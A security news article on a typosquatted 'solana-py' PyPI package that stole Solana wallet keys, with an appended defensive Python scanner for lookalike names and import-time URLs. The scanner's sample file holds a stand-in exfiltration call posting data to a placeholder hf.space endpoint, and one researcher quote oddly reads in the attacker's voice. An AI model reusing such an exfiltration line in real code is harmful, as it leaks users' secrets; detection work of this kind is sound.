
Rogue PyPI Library Targets Solana Users, Steals Blockchain Wallet Keys
August 11, 2024 | Ravie Lakshmanan | Supply Chain / Software Security

Cybersecurity researchers have discovered a new malicious package in the Python Package Index (PyPI) repository that masquerades as a library of the Solana blockchain platform, but is actually designed to steal secrets from victims.

“The legitimate Solana Python API project is known as ‘solana-py’ on GitHub, but simply ‘solana’ on the Python software registry, PyPI,” Sonatype researcher Ax Sharma said in a report published last week. “This small naming discrepancy was exploited by a threat actor who published a ‘solana-py’ project on PyPI.”

The malicious “solana-py” package has been downloaded a total of 1,122 times since its publication on August 4, 2024. It is no longer available for download via PyPI.

The most notable aspect of the library is that it carried the version numbers 0.34.3, 0.34.4, and 0.34.5, while the latest version of the legitimate “solana” package is 0.34.3. Advertising version numbers higher than the real project’s is a clear attempt by the threat actor to trick users searching for “solana” into inadvertently downloading “solana-py” instead.

Furthermore, the fraudulent package copies the real code from its legitimate counterpart, but injects additional code into the “__init__.py” script that collects Solana blockchain wallet keys from the victim’s system.

This information is then exfiltrated to a Hugging Face Spaces domain controlled by the threat actor (“treeprime-gen.hf(.)space”), further highlighting how threat actors abuse legitimate services to host malicious infrastructure.

The attack campaign poses a supply chain risk, as Sonatype’s research found that legitimate libraries such as “solders” reference “solana-py” in their PyPI documentation. This could lead to a scenario where developers accidentally download “solana-py” from PyPI, thereby increasing the attack surface.

“In other words, if a developer uses the legitimate ‘solders’ PyPI package in his application and gets tricked (by solders’ documentation) into falling for the typosquatted ‘solana-py’ project, he inadvertently introduces a crypto-stealer into his application,” Sharma explains.

“By doing this, we not only steal their secrets, but also those of every user who uses the developer’s application.”
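As an added defensive example, not code from the article or from Sonatype: the two checks below parse a requirements file for the confusable name discussed above (the “solders” documentation scenario) and statically scan a package’s “__init__.py” for URL literals in import-time code, the place where the injected exfiltration call described earlier runs. The confusable-name table, the placeholder Spaces host and both sample inputs are constructed for this example.

```python
"""Added example (not Sonatype's or the article's code). Assumes a requirements
file and the unpacked package's __init__.py are on disk; inputs are constructed."""
import ast
import re

# Constructed table: names that sound like a real project but are not that
# project's PyPI name (the article: GitHub "solana-py" is PyPI "solana").
CONFUSABLE = {"solana-py": "solana"}
URL_RE = re.compile(r"https?://([^/\s]+)")

def flag_confusable_requirements(requirements_text):
    """Return [(requested_name, real_pypi_name)] for known lookalikes."""
    hits = []
    for line in requirements_text.splitlines():
        name = re.split(r"[<>=!~\[; ]", line.strip(), maxsplit=1)[0].lower()
        if name in CONFUSABLE:
            hits.append((name, CONFUSABLE[name]))
    return hits

def find_import_time_urls(source, allowed_hosts=()):
    """Return [(lineno, host)] for URL literals in module-level statements,
    i.e. code that runs at import time, which is where injected exfiltration sits."""
    findings = []
    for node in ast.parse(source).body:
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue  # bodies only run when called; the rogue code ran on import
        for sub in ast.walk(node):
            if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
                m = URL_RE.match(sub.value)
                if m and m.group(1) not in allowed_hosts:
                    findings.append((sub.lineno, m.group(1)))
    return findings

# Constructed sample: a normal-looking __init__.py with an appended
# import-time POST to a placeholder Spaces host (not the real indicator).
SAMPLE_INIT = '''"""Solana Python API (sample)."""
from .rpc import api  # normal re-export

def helper():
    return "https://docs.example.org/"  # inside a function: not import-time

import requests
requests.post("https://PLACEHOLDER-space.hf.space/collect", data={"k": "..."})
'''
SAMPLE_REQS = "requests>=2.31\nsolders\nsolana-py==0.34.5\n"

if __name__ == "__main__":
    print(flag_confusable_requirements(SAMPLE_REQS))  # [('solana-py', 'solana')]
    print(find_import_time_urls(SAMPLE_INIT))  # [(8, 'PLACEHOLDER-space.hf.space')]
```

Running the URL scan against a freshly downloaded sdist before installing it surfaces import-time network endpoints for review; hosts the package legitimately contacts go in allowed_hosts.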

The revelation comes after Phylum said it had identified hundreds of thousands of spam packages in the npm registry containing markers of Tea protocol abuse. This campaign first came to light in April 2024.

“The Tea Protocol project is taking steps to address this issue,” the supply chain security firm said. “It would be unfair for legitimate Tea Protocol participants to have their rewards reduced because others are scamming the system. Additionally, npm has begun removing some of these spammers, but the removal rate does not match the new publishing rate.”
